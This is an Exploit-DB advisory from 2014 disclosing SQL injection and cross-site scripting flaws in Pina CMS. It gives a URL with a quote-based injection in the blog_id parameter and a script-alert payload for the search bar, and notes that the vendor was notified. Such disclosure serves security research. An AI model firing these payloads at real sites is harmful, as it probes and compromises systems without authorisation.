Pina CMS - Multiple Vulnerabilities

Author: Shadman Tanjim
type: webapps
platform: php
port: 80.0
date_added: 2014-02-18  
date_updated: 2014-03-15  
verified: 0  
codes: OSVDB-103445;OSVDB-103444  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.compinacms-master.zip  

raw file: 31734.txt  

############################################################################
# Title: Pina CMS SQL Injection and XSS Vulnerabilities
# Vendor: www.pinacms.com
# Vendor Notified: 15-02-2014
# Vendor Replied: 16-02-2014
# Release in Public: 18-02-2014
# Tested on: Windows/Linux
# Author/Found by: Shadman Tanjim
# Website: www.secupent.com and www.vulnerability.io
# Email: service@secupent.com or shadman2600@gmail.com
# Twitter: twitter.com/secupent
# Facebook: fb.me/secupent
############################################################################

1. Vulnerability no 1 (SQL Injection):

http://target.com/page.php?action=post.manage.home&blog_id=1%27%22

Demo screenshot: https://www.dropbox.com/s/cpxvk7h1dxu8xnv/pina2.png

2. Vulnerability no 2. (XSS):

Go to this link: http://target.com/page.php?action=post.manage.home

Apply this JavaScript on search bar

 "/><script>alert(574127);</script>

Demo screenshot: https://www.dropbox.com/s/8jc51blyepypfas/pina1.png




Greets: Sayem Islam, Maruf Alam, Isti Ak Ahmed, Team BCA, Team Secupent and all Cyber Security Expert and Bug Hunters.....